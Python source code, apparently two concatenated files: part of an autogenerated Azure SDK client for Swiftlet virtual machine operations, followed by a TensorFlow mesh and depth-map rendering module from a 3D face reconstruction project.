:return: An instance of LROPoller that returns either None or the result of cls(response)
:rtype: ~azure.core.polling.LROPoller[None]
:raises ~azure.core.exceptions.HttpResponseError:
"""
polling = kwargs.pop('polling', True) # type: Union[bool, PollingMethod]
cls = kwargs.pop('cls', None) # type: ClsType[None]
lro_delay = kwargs.pop(
'polling_interval',
self._config.polling_interval
)
cont_token = kwargs.pop('continuation_token', None) # type: Optional[str]
if cont_token is None:
raw_result = self._delete_initial(
resource_group_name=resource_group_name,
vm_name=vm_name,
cls=lambda x,y,z: x,
**kwargs
)
kwargs.pop('error_map', None)
kwargs.pop('content_type', None)
def get_long_running_output(pipeline_response):
if cls:
return cls(pipeline_response, None, {})
if polling is True: polling_method = ARMPolling(lro_delay, **kwargs)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
if cont_token:
return LROPoller.from_continuation_token(
polling_method=polling_method,
continuation_token=cont_token,
client=self._client,
deserialization_callback=get_long_running_output
)
else:
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
begin_delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}'} # type: ignore
def get(
self,
resource_group_name, # type: str
vm_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "models.VirtualMachine"
"""Get information about the virtual machine.
:param resource_group_name: The name of the resource group within the user’s subscription ID.
:type resource_group_name: str
:param vm_name: The name of the virtual machine.
:type vm_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: VirtualMachine, or the result of cls(response)
:rtype: ~swiftlet_management_client.models.VirtualMachine
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.VirtualMachine"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01-preview"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'vmName': self._serialize.url("vm_name", vm_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('VirtualMachine', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines/{vmName}'} # type: ignore
def list_by_resource_group(
self,
resource_group_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["models.VirtualMachineListResult"]
"""List all of the virtual machines in the specified resource group. Use the nextLink property in
the response to get the next page of virtual machines.
:param resource_group_name: The name of the resource group within the user’s subscription ID.
:type resource_group_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualMachineListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~swiftlet_management_client.models.VirtualMachineListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.VirtualMachineListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01-preview"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualMachineListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Swiftlet/virtualMachines'} # type: ignore
def list_by_subscription(
self,
**kwargs # type: Any
):
# type: (...) -> Iterable["models.VirtualMachineListResult"]
"""List all of the virtual machines in the specified subscription. Use the nextLink property in
the response to get the next page of virtual machines.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either VirtualMachineListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~swiftlet_management_client.models.VirtualMachineListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["models.VirtualMachineListResult"]
error_map = {404: ResourceNotFoundError, 409: ResourceExistsError}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-03-01-preview"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = 'application/json'
if not next_link:
# Construct URL
url = self.list_by_subscription.metadata['url'] # type: ignore
path_format_arguments = {
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('VirtualMachineListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list_by_subscription.metadata = {'url': '/subscriptions/{subscriptionId}/providers/Microsoft.Swiftlet/virtualMachines'} # type: ignore
|
Face Reconstruction/Self-Supervised Monocular 3D Face Reconstruction by Occlusion-Aware Multi-view Geometry Consistency/src_common/geometry/render/api_tf_mesh_render.py | swapnilgarg7/Face-X | 302 | 12776414 | <filename>Face Reconstruction/Self-Supervised Monocular 3D Face Reconstruction by Occlusion-Aware Multi-view Geometry Consistency/src_common/geometry/render/api_tf_mesh_render.py<gh_stars>100-1000
# system
from __future__ import print_function
# python lib
import math
from copy import deepcopy
import numpy as np
# tf_render
import tensorflow as tf
# self
from thirdParty.tf_mesh_renderer.mesh_renderer.mesh_renderer import phong_shader, tone_mapper
from thirdParty.tf_mesh_renderer.mesh_renderer.rasterize_triangles import rasterize_triangles
# perspective
def mesh_renderer_camera_light(vertices, triangles, normals, diffuse_colors,
mtx_camera, mtx_perspective_frustrum, camera_position,
image_width, image_height):
"""Renders an input scene using phong shading, and returns an output image.
Args:
vertices: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is an xyz position in world space.
triangles: 2-D int32 tensor with shape [triangle_count, 3]. Each triplet
should contain vertex indices describing a triangle such that the
triangle's normal points toward the viewer if the forward order of the
triplet defines a clockwise winding of the vertices. Gradients with
respect to this tensor are not available.
normals: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is the xyz vertex normal for its corresponding vertex. Each
vector is assumed to be already normalized.
diffuse_colors: 3-D float32 tensor with shape [batch_size,
vertex_count, 3]. The RGB diffuse reflection in the range [0,1] for
each vertex.
mtx_camera: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the camera model view matrix
mtx_perspective_frustrum: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the perspective and frustrum matrix
camera_position: 2-D tensor with shape [batch_size, 3] or 1-D tensor with
shape [3] specifying the XYZ world space camera position.
light_intensities: a 3-D tensor with shape [batch_size, light_count, 3]. The
RGB intensity values for each light. Intensities may be above one.
image_width: int specifying desired output image width in pixels.
image_height: int specifying desired output image height in pixels.
Returns:
A 4-D float32 tensor of shape [batch_size, image_height, image_width, 4]
containing the lit RGBA color values for each image at each pixel. RGB
colors are the intensity values before tonemapping and can be in the range
[0, infinity]. Clipping to the range [0,1] with tf_render.clip_by_value is likely
reasonable for both viewing and training most scenes. More complex scenes
with multiple lights should tone map color values for display only. One
simple tonemapping approach is to rescale color values as x/(1+x); gamma
compression is another common techinque. Alpha values are zero for
background pixels and near one for mesh pixels.
Raises:
ValueError: An invalid argument to the method is detected.
"""
if len(vertices.shape) != 3:
raise ValueError('Vertices must have shape [batch_size, vertex_count, 3].')
batch_size = vertices.shape[0].value
if len(normals.shape) != 3:
raise ValueError('Normals must have shape [batch_size, vertex_count, 3].')
if len(diffuse_colors.shape) != 3:
raise ValueError(
'vertex_diffuse_colors must have shape [batch_size, vertex_count, 3].')
if camera_position.get_shape().as_list() == [3]:
camera_position = tf.tile(
tf.expand_dims(camera_position, axis=0), [batch_size, 1])
elif camera_position.get_shape().as_list() != [batch_size, 3]:
raise ValueError('Camera_position must have shape [batch_size, 3]')
# TODO: Debug Shape
if mtx_camera.get_shape().as_list() == [4, 4]:
mtx_camera = tf.tile(
tf.expand_dims(mtx_camera, axis=0), [batch_size, 1, 1])
elif mtx_camera.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('Camera_lookat must have shape [batch_size, 4, 4]')
if mtx_perspective_frustrum.get_shape().as_list() == [4, 4]:
mtx_camera = tf.tile(
tf.expand_dims(mtx_perspective_frustrum, axis=0), [batch_size, 1])
elif mtx_camera.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('Camera_lookat must have shape [batch_size, 4, 4]')
vertex_attributes = tf.concat([normals, vertices, diffuse_colors], axis=2)
clip_space_transforms = tf.matmul(mtx_perspective_frustrum, mtx_camera, name="mtx_clip_space_transforms_batch")
pixel_attributes, alpha, tri_ids = rasterize_triangles(
vertices, vertex_attributes, triangles, clip_space_transforms,
image_width, image_height, [-1] * vertex_attributes.shape[2].value)
# Extract the interpolated vertex attributes from the pixel buffer and
# supply them to the shader:
#pixel_normals = tf.nn.l2_normalize(pixel_attributes[:, :, :, 0:3], dim=3)
#pixel_positions = pixel_attributes[:, :, :, 3:6]
diffuse_colors = pixel_attributes[:, :, :, 6:9]
diffuse_colors = tf.reverse(diffuse_colors, axis=[1])
#return renders, pixel_mask
pixel_mask = alpha > 0.5
pixel_mask = tf.cast(pixel_mask, dtype=tf.float32)
pixel_mask = tf.reverse(pixel_mask, axis=[1])
#
tri_ids = tf.expand_dims(tri_ids, -1)
return diffuse_colors, pixel_mask, tri_ids
def mesh_renderer_camera(vertices, triangles, normals, diffuse_colors,
mtx_camera, mtx_perspective_frustrum, camera_position,
light_positions, light_intensities, image_width, image_height,
specular_colors=None, shininess_coefficients=None, ambient_color=None, background=-1
):
"""Renders an input scene using phong shading, and returns an output image.
Args:
vertices: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is an xyz position in world space.
triangles: 2-D int32 tensor with shape [triangle_count, 3]. Each triplet
should contain vertex indices describing a triangle such that the
triangle's normal points toward the viewer if the forward order of the
triplet defines a clockwise winding of the vertices. Gradients with
respect to this tensor are not available.
normals: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is the xyz vertex normal for its corresponding vertex. Each
vector is assumed to be already normalized.
diffuse_colors: 3-D float32 tensor with shape [batch_size,
vertex_count, 3]. The RGB diffuse reflection in the range [0,1] for
each vertex.
mtx_camera: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the camera model view matrix
mtx_perspective_frustrum: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the perspective and frustrum matrix
camera_position: 2-D tensor with shape [batch_size, 3] or 1-D tensor with
shape [3] specifying the XYZ world space camera position.
light_positions: a 3-D tensor with shape [batch_size, light_count, 3]. The
XYZ position of each light in the scene. In the same coordinate space as
pixel_positions.
light_intensities: a 3-D tensor with shape [batch_size, light_count, 3]. The
RGB intensity values for each light. Intensities may be above one.
image_width: int specifying desired output image width in pixels.
image_height: int specifying desired output image height in pixels.
specular_colors: 3-D float32 tensor with shape [batch_size,
vertex_count, 3]. The RGB specular reflection in the range [0, 1] for
each vertex. If supplied, specular reflections will be computed, and
both specular_colors and shininess_coefficients are expected.
shininess_coefficients: a 0D-2D float32 tensor with maximum shape
[batch_size, vertex_count]. The phong shininess coefficient of each
vertex. A 0D tensor or float gives a constant shininess coefficient
across all batches and images. A 1D tensor must have shape [batch_size],
and a single shininess coefficient per image is used.
ambient_color: a 2D tensor with shape [batch_size, 3]. The RGB ambient
color, which is added to each pixel in the scene. If None, it is
assumed to be black.
Returns:
A 4-D float32 tensor of shape [batch_size, image_height, image_width, 4]
containing the lit RGBA color values for each image at each pixel. RGB
colors are the intensity values before tonemapping and can be in the range
[0, infinity]. Clipping to the range [0,1] with tf_render.clip_by_value is likely
reasonable for both viewing and training most scenes. More complex scenes
with multiple lights should tone map color values for display only. One
simple tonemapping approach is to rescale color values as x/(1+x); gamma
compression is another common techinque. Alpha values are zero for
background pixels and near one for mesh pixels.
Raises:
ValueError: An invalid argument to the method is detected.
"""
if len(vertices.shape) != 3:
raise ValueError('Vertices must have shape [batch_size, vertex_count, 3].')
batch_size = vertices.shape[0].value
if len(normals.shape) != 3:
raise ValueError('Normals must have shape [batch_size, vertex_count, 3].')
if len(light_positions.shape) != 3:
raise ValueError(
'Light_positions must have shape [batch_size, light_count, 3].')
if len(light_intensities.shape) != 3:
raise ValueError(
'Light_intensities must have shape [batch_size, light_count, 3].')
if len(diffuse_colors.shape) != 3:
raise ValueError(
'vertex_diffuse_colors must have shape [batch_size, vertex_count, 3].')
if (ambient_color is not None and
ambient_color.get_shape().as_list() != [batch_size, 3]):
raise ValueError('Ambient_color must have shape [batch_size, 3].')
if camera_position.get_shape().as_list() == [3]:
camera_position = tf.tile(
tf.expand_dims(camera_position, axis=0), [batch_size, 1])
elif camera_position.get_shape().as_list() != [batch_size, 3]:
raise ValueError('Camera_position must have shape [batch_size, 3]')
# TODO: Debug Shape
if mtx_camera.get_shape().as_list() == [4, 4]:
mtx_camera = tf.tile(
tf.expand_dims(mtx_camera, axis=0), [batch_size, 1, 1])
elif mtx_camera.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('Camera_lookat must have shape [batch_size, 4, 4]')
if mtx_perspective_frustrum.get_shape().as_list() == [4, 4]:
mtx_camera = tf.tile(
tf.expand_dims(mtx_perspective_frustrum, axis=0), [batch_size, 1])
elif mtx_camera.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('Camera_lookat must have shape [batch_size, 4, 4]')
if specular_colors is not None and shininess_coefficients is None:
raise ValueError(
'Specular colors were supplied without shininess coefficients.')
if shininess_coefficients is not None and specular_colors is None:
raise ValueError(
'Shininess coefficients were supplied without specular colors.')
if specular_colors is not None:
# Since a 0-D float32 tensor is accepted, also accept a float.
if isinstance(shininess_coefficients, float):
shininess_coefficients = tf.constant(
shininess_coefficients, dtype=tf.float32)
if len(specular_colors.shape) != 3:
raise ValueError('The specular colors must have shape [batch_size, '
'vertex_count, 3].')
if len(shininess_coefficients.shape) > 2:
raise ValueError('The shininess coefficients must have shape at most'
'[batch_size, vertex_count].')
# If we don't have per-vertex coefficients, we can just reshape the
# input shininess to broadcast later, rather than interpolating an
# additional vertex attribute:
if len(shininess_coefficients.shape) < 2:
vertex_attributes = tf.concat(
[normals, vertices, diffuse_colors, specular_colors], axis=2)
else:
vertex_attributes = tf.concat(
[
normals, vertices, diffuse_colors, specular_colors,
tf.expand_dims(shininess_coefficients, axis=2)
],
axis=2)
else:
vertex_attributes = tf.concat([normals, vertices, diffuse_colors], axis=2)
# camera_matrices = camera_utils.look_at(camera_position, camera_lookat,
# camera_up)
#
# perspective_transforms = camera_utils.perspective(image_width / image_height,
# fov_y, near_clip, far_clip)
clip_space_transforms = tf.matmul(mtx_perspective_frustrum, mtx_camera, name="mtx_clip_space_transforms_batch")
pixel_attributes, alpha, tri_ids = rasterize_triangles(
vertices, vertex_attributes, triangles, clip_space_transforms,
image_width, image_height, [background] * vertex_attributes.shape[2].value)
# Extract the interpolated vertex attributes from the pixel buffer and
# supply them to the shader:
pixel_normals = tf.nn.l2_normalize(pixel_attributes[:, :, :, 0:3], dim=3)
pixel_positions = pixel_attributes[:, :, :, 3:6]
diffuse_colors = pixel_attributes[:, :, :, 6:9]
if specular_colors is not None:
specular_colors = pixel_attributes[:, :, :, 9:12]
# Retrieve the interpolated shininess coefficients if necessary, or just
# reshape our input for broadcasting:
if len(shininess_coefficients.shape) == 2:
shininess_coefficients = pixel_attributes[:, :, :, 12]
else:
shininess_coefficients = tf.reshape(shininess_coefficients, [-1, 1, 1])
pixel_mask = tf.cast(tf.reduce_any(diffuse_colors >= 0, axis=3), tf.float32)
renders = phong_shader(
normals=pixel_normals,
alphas=pixel_mask,
pixel_positions=pixel_positions,
light_positions=light_positions,
light_intensities=light_intensities,
diffuse_colors=diffuse_colors,
camera_position=camera_position if specular_colors is not None else None,
specular_colors=specular_colors,
shininess_coefficients=shininess_coefficients,
ambient_color=ambient_color)
#return renders, pixel_mask
pixel_mask = alpha > 0.5
pixel_mask = tf.cast(pixel_mask, dtype=tf.float32)
pixel_mask = tf.reverse(pixel_mask, axis=[1])
return renders, pixel_mask
def mesh_depthmap_camera(vertices, triangles, mtx_ext,
mtx_camera, mtx_perspective_frustrum,
image_width, image_height
):
"""Renders an input scene using phong shading, and returns an output image.
Args:
vertices: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is an xyz position in world space.
triangles: 2-D int32 tensor with shape [triangle_count, 3]. Each triplet
should contain vertex indices describing a triangle such that the
triangle's normal points toward the viewer if the forward order of the
triplet defines a clockwise winding of the vertices. Gradients with
respect to this tensor are not available.
normals: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is the xyz vertex normal for its corresponding vertex. Each
vector is assumed to be already normalized.
mtx_camera: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the camera model view matrix
mtx_perspective_frustrum: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the perspective and frustrum matrix
camera_position: 2-D tensor with shape [batch_size, 3] or 1-D tensor with
shape [3] specifying the XYZ world space camera position.
image_width: int specifying desired output image width in pixels.
image_height: int specifying desired output image height in pixels.
Returns:
A 4-D float32 tensor of shape [batch_size, image_height, image_width, 4]
containing the lit RGBA color values for each image at each pixel. RGB
colors are the intensity values before tonemapping and can be in the range
[0, infinity]. Clipping to the range [0,1] with tf_render.clip_by_value is likely
reasonable for both viewing and training most scenes. More complex scenes
with multiple lights should tone map color values for display only. One
simple tonemapping approach is to rescale color values as x/(1+x); gamma
compression is another common techinque. Alpha values are zero for
background pixels and near one for mesh pixels.
Raises:
ValueError: An invalid argument to the method is detected.
"""
if len(vertices.shape) != 3:
raise ValueError('Vertices must have shape [batch_size, vertex_count, 3].')
batch_size = vertices.shape[0].value
# TODO: Debug Shape
if mtx_camera.get_shape().as_list() == [4, 4]:
mtx_camera = tf.tile(
tf.expand_dims(mtx_camera, axis=0), [batch_size, 1, 1])
elif mtx_camera.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('Camera_lookat must have shape [batch_size, 4, 4]')
if mtx_perspective_frustrum.get_shape().as_list() == [4, 4]:
mtx_camera = tf.tile(
tf.expand_dims(mtx_perspective_frustrum, axis=0), [batch_size, 1])
elif mtx_camera.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('Camera_lookat must have shape [batch_size, 4, 4]')
# vertex attribute of depthmap is only z
vertex_attributes = vertices
#vertex_attributes = tf_render.expand_dims(vertex_attributes, -1)
# camera_matrices = camera_utils.look_at(camera_position, camera_lookat,
# camera_up)
#
# perspective_transforms = camera_utils.perspective(image_width / image_height,
# fov_y, near_clip, far_clip)
clip_space_transforms = tf.matmul(mtx_perspective_frustrum, mtx_camera, name="mtx_clip_space_transforms_batch")
pixel_attributes, alpha, _ = rasterize_triangles(
vertices, vertex_attributes, triangles, clip_space_transforms,
image_width, image_height, [99999999] * vertex_attributes.shape[2].value)
# Extract the interpolated vertex attributes from the pixel buffer and
# supply them to the shader:
filler_homo = tf.ones(shape=[pixel_attributes.shape[0], pixel_attributes.shape[1], pixel_attributes.shape[2], 1])
pixel_attributes = tf.concat([pixel_attributes, filler_homo], axis=3)
pixel_attributes = tf.reshape(pixel_attributes, shape=[batch_size, -1, 4])
pixel_attributes = tf.transpose(pixel_attributes, perm=[0, 2, 1])
pixel_attributes = tf.matmul(mtx_ext, pixel_attributes)
pixel_attributes = tf.transpose(pixel_attributes, perm=[0, 2, 1])
pixel_attributes = tf.reshape(pixel_attributes, shape=[batch_size, image_height, image_width, 4])
depth_map = pixel_attributes[:, :, :, 2]
pixel_mask = alpha > 0.5
pixel_mask = tf.cast(pixel_mask, dtype=tf.float32)
depth_map = tf.reverse(depth_map, axis=[1])
pixel_mask = tf.reverse(pixel_mask, axis=[1])
return depth_map, pixel_mask
# ortho
def mesh_rendererOrtho_camera(vertices, triangles, normals, diffuse_colors,
mtx_camera, mtx_perspective_frustrum, light_positions, light_intensities,
image_width, image_height, ambient_color=None, background=-1
):
"""Renders an input scene using phong shading, and returns an output image.
Args:
vertices: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is an xyz position in world space.
triangles: 2-D int32 tensor with shape [triangle_count, 3]. Each triplet
should contain vertex indices describing a triangle such that the
triangle's normal points toward the viewer if the forward order of the
triplet defines a clockwise winding of the vertices. Gradients with
respect to this tensor are not available.
normals: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is the xyz vertex normal for its corresponding vertex. Each
vector is assumed to be already normalized.
diffuse_colors: 3-D float32 tensor with shape [batch_size,
vertex_count, 3]. The RGB diffuse reflection in the range [0,1] for
each vertex.
mtx_camera: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the camera model view matrix
mtx_perspective_frustrum: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the perspective and frustrum matrix
camera_position: 2-D tensor with shape [batch_size, 3] or 1-D tensor with
shape [3] specifying the XYZ world space camera position.
light_positions: a 3-D tensor with shape [batch_size, light_count, 3]. The
XYZ position of each light in the scene. In the same coordinate space as
pixel_positions.
light_intensities: a 3-D tensor with shape [batch_size, light_count, 3]. The
RGB intensity values for each light. Intensities may be above one.
image_width: int specifying desired output image width in pixels.
image_height: int specifying desired output image height in pixels.
specular_colors: 3-D float32 tensor with shape [batch_size,
vertex_count, 3]. The RGB specular reflection in the range [0, 1] for
each vertex. If supplied, specular reflections will be computed, and
both specular_colors and shininess_coefficients are expected.
shininess_coefficients: a 0D-2D float32 tensor with maximum shape
[batch_size, vertex_count]. The phong shininess coefficient of each
vertex. A 0D tensor or float gives a constant shininess coefficient
across all batches and images. A 1D tensor must have shape [batch_size],
and a single shininess coefficient per image is used.
ambient_color: a 2D tensor with shape [batch_size, 3]. The RGB ambient
color, which is added to each pixel in the scene. If None, it is
assumed to be black.
Returns:
A 4-D float32 tensor of shape [batch_size, image_height, image_width, 4]
containing the lit RGBA color values for each image at each pixel. RGB
colors are the intensity values before tonemapping and can be in the range
[0, infinity]. Clipping to the range [0,1] with tf_render.clip_by_value is likely
reasonable for both viewing and training most scenes. More complex scenes
with multiple lights should tone map color values for display only. One
simple tonemapping approach is to rescale color values as x/(1+x); gamma
compression is another common techinque. Alpha values are zero for
background pixels and near one for mesh pixels.
Raises:
ValueError: An invalid argument to the method is detected.
"""
if len(vertices.shape) != 3:
raise ValueError('Vertices must have shape [batch_size, vertex_count, 3].')
batch_size = vertices.shape[0].value
if len(normals.shape) != 3:
raise ValueError('Normals must have shape [batch_size, vertex_count, 3].')
if len(light_positions.shape) != 3:
raise ValueError(
'Light_positions must have shape [batch_size, light_count, 3].')
if len(light_intensities.shape) != 3:
raise ValueError(
'Light_intensities must have shape [batch_size, light_count, 3].')
if len(diffuse_colors.shape) != 3:
raise ValueError(
'vertex_diffuse_colors must have shape [batch_size, vertex_count, 3].')
if (ambient_color is not None and
ambient_color.get_shape().as_list() != [batch_size, 3]):
raise ValueError('Ambient_color must have shape [batch_size, 3].')
# TODO: Debug Shape
if mtx_camera.get_shape().as_list() == [4, 4]:
mtx_camera = tf.tile(
tf.expand_dims(mtx_camera, axis=0), [batch_size, 1, 1])
elif mtx_camera.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('Camera_lookat must have shape [batch_size, 4, 4]')
if mtx_perspective_frustrum.get_shape().as_list() == [4, 4]:
mtx_camera = tf.tile(
tf.expand_dims(mtx_perspective_frustrum, axis=0), [batch_size, 1])
elif mtx_camera.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('Camera_lookat must have shape [batch_size, 4, 4]')
vertex_attributes = tf.concat([normals, vertices, diffuse_colors], axis=2)
clip_space_transforms = tf.matmul(mtx_perspective_frustrum, mtx_camera, name="mtx_clip_space_transforms_batch")
pixel_attributes, alpha, tri_ids = rasterize_triangles(
vertices, vertex_attributes, triangles, clip_space_transforms,
image_width, image_height, [background] * vertex_attributes.shape[2].value)
# Extract the interpolated vertex attributes from the pixel buffer and
# supply them to the shader:
pixel_normals = tf.nn.l2_normalize(pixel_attributes[:, :, :, 0:3], dim=3)
pixel_positions = pixel_attributes[:, :, :, 3:6]
diffuse_colors = pixel_attributes[:, :, :, 6:9]
pixel_mask = tf.cast(tf.reduce_any(diffuse_colors >= 0, axis=3), tf.float32)
renders = phong_shader(
normals=pixel_normals,
alphas=pixel_mask,
pixel_positions=pixel_positions,
light_positions=light_positions,
light_intensities=light_intensities,
diffuse_colors=diffuse_colors,
camera_position=None,
specular_colors=None,
shininess_coefficients=None,
ambient_color=ambient_color)
#return renders, pixel_mask
pixel_mask = alpha > 0.5
pixel_mask = tf.cast(pixel_mask, dtype=tf.float32)
pixel_mask = tf.reverse(pixel_mask, axis=[1])
return renders, pixel_mask
def mesh_depthmapOrtho_camera(vertices, triangles,
mtx_ext, mtx_perspective_frustrum, image_width, image_height
):
"""Renders an input scene using phong shading, and returns an output image.
Args:
vertices: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is an xyz position in world space.
triangles: 2-D int32 tensor with shape [triangle_count, 3]. Each triplet
should contain vertex indices describing a triangle such that the
triangle's normal points toward the viewer if the forward order of the
triplet defines a clockwise winding of the vertices. Gradients with
respect to this tensor are not available.
normals: 3-D float32 tensor with shape [batch_size, vertex_count, 3]. Each
triplet is the xyz vertex normal for its corresponding vertex. Each
vector is assumed to be already normalized.
mtx_camera: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the camera model view matrix
mtx_perspective_frustrum: 3-D tensor with shape [batch_size, 4, 4] or 2-D tensor with
shape [4, 4] specifying the perspective and frustrum matrix
camera_position: 2-D tensor with shape [batch_size, 3] or 1-D tensor with
shape [3] specifying the XYZ world space camera position.
image_width: int specifying desired output image width in pixels.
image_height: int specifying desired output image height in pixels.
Returns:
A 4-D float32 tensor of shape [batch_size, image_height, image_width, 4]
containing the lit RGBA color values for each image at each pixel. RGB
colors are the intensity values before tonemapping and can be in the range
[0, infinity]. Clipping to the range [0,1] with tf_render.clip_by_value is likely
reasonable for both viewing and training most scenes. More complex scenes
with multiple lights should tone map color values for display only. One
simple tonemapping approach is to rescale color values as x/(1+x); gamma
compression is another common techinque. Alpha values are zero for
background pixels and near one for mesh pixels.
Raises:
ValueError: An invalid argument to the method is detected.
"""
if len(vertices.shape) != 3:
raise ValueError('Vertices must have shape [batch_size, vertex_count, 3].')
batch_size = vertices.shape[0].value
# TODO: Debug Shape
if mtx_ext.get_shape().as_list() == [4, 4]:
mtx_ext = tf.tile(
tf.expand_dims(mtx_ext, axis=0), [batch_size, 1, 1])
elif mtx_ext.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('Camera_lookat must have shape [batch_size, 4, 4]')
if mtx_perspective_frustrum.get_shape().as_list() == [4, 4]:
mtx_perspective_frustrum = tf.tile(
tf.expand_dims(mtx_perspective_frustrum, axis=0), [batch_size, 1])
elif mtx_perspective_frustrum.get_shape().as_list() != [batch_size, 4, 4]:
raise ValueError('Camera_lookat must have shape [batch_size, 4, 4]')
# vertex attribute of depthmap is only z
vertex_attributes = vertices
#vertex_attributes = tf_render.expand_dims(vertex_attributes, -1)
# camera_matrices = camera_utils.look_at(camera_position, camera_lookat,
# camera_up)
#
